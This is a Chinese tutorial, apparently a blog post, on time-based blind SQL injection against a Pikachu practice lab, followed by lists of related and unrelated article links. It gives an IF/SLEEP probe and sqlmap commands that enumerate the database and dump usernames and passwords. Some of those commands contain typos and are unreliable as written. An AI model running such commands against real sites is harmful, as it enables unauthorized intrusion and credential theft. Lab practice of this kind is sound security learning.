时间注入是盲注入的一种,利用的场景是当目标无法使用布尔盲注获得数据可以使用这种基于时间延迟的注入
利用语法
select if(length(database())>1,sleep(5),0)
这里的意思是数据名的长度如果大于1就延时5秒返回结果
这种注入方式还是使用sqlmap进行利用
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql
这里–technique=T 是指定注入的类型位时间延长注入

可以看出sqlmap检测出来了,接下来查看当前库名
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --current-db --threads 10 --batch

当前库名为pikachu,跑表名
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --tables -D pikachu --batch


列出字段
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --cplumns -T users -D pikachu --batch

出数据
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql -C “username,password” -T users D pikachu – threads 10 --batch

sql注入之时间注入相关推荐

  1. SQL注入——基于时间的盲注(九)

    本章目的 普及延时盲注技术的运用场景及条件,熟悉length().Substr().ascii().sleep().if()等函数的用法,掌握基于时间的盲注基本流程.PS:面试问答不深问就回答延迟 基 ...

  2. SQL 注入漏洞(八)时间注入/延时注入

    一.时间注入 时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据,而采用一种突破注入的技巧. 在 mysql 里 函数 sleep() 是延时的意思,sleep(10) ...

  3. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  4. sql注入学习——时间盲注

    前言:之前通过前九关学习到了回显注入.报错注入.布尔盲注等一些方法,这次就来详细的学习时间盲注. 在上一篇博客中,了解了布尔盲注,其实布尔盲注和时间盲注大致相同,注入原理是一致的,区别就是一个还是有回 ...

  5. SQL注入天书-ASP注入漏洞全接触

    引     言                 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序 ...

  6. sql参数化还是被注入了_SQL注入是什么?

    SQL注入(SQLi)是一种注入攻击,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器.攻击者可以使用SQL注入漏洞绕过应用程序安全措 ...

  7. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  8. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

  9. sql注入利用_SQL注入:这是什么? 原因和利用

    sql注入利用 摘要 (Summary) Many security vulnerabilities are discovered, patched, and go away forever. Som ...

  10. 安全漏洞之SQL注入和shell注入

    SQL注入 发生部位 SQL注入安全漏洞发生于应用程序和数据库之间. 原理 当攻击者在输入的字符串之中注入SQL指令,由于程序没有设置相关的字符检查,那么这些指令就会被数据服务器认为是正常的SQL指令 ...

最新文章

  1. php无限极下拉框,php递归实现无限分类生成下拉列表的函数
  2. 方法---课程作业02
  3. ◎◎identity ,ident_current() ,scope_identity的区别
  4. 深入探讨傅立叶变换、拉普拉斯变换、Z变换的联系与应用
  5. https://blog.csdn.net/weixin_40412037/article/details/112235003
  6. SpringMVC日期类型转换问题处理方法归纳
  7. 怎么打公式_我们总结了一条抖音爆款公式
  8. 解决从PDF复制到Word中的英文字母变成宋体格式的问题
  9. 数学分析第四版上册70页14题
  10. 实现微信 委托代扣/包月服务
  11. 基恩士计算机软件,【基恩士】IV 系列 开始指南 PC软件篇 (简体中文).pdf
  12. win10 clion msvc opencv4.10 报错Process finished with exit code -1073741515 (0xC0000135)
  13. 指纹识别技术的发展前景是怎样的?
  14. Anbox安装apk失败(提示Failure res=-113等)的解决方法
  15. MFC入门(三)-- MFC图片/文字控件(循环显示文字和图片的小程序)
  16. svm算法java实现_谁有用JAVA实现机器学习svm算法的代码,感激不尽
  17. ps4 html5不能试用,PS4主机卡碟,无法取出光盘的处理办法
  18. Datewhale组队学习——深度学习推荐系统(1)
  19. 状态码502和504分析
  20. Jquery事件大全

热门文章

  1. matlab数学建模-遗传算法基本原理
  2. 【Vue脚手架安装教程】
  3. matlab如何把正弦转化为余弦公式,余弦和正切的换算关系(正弦余弦正切转换公式大全)...
  4. 工厂智能化远程运营管理系统方案
  5. VNC Viewer从本地windows复制粘贴中文到ubuntu服务器中出现乱码(准确来说是unicode)的情况
  6. 微信小程序布局 左右结构简单例子
  7. vue 富文本编辑器 —— wangEditor
  8. 映美精双目相机无法同时显示的问题
  9. 【微信小程序】常用组件及基本使用详解
  10. python OJ 绝对值最大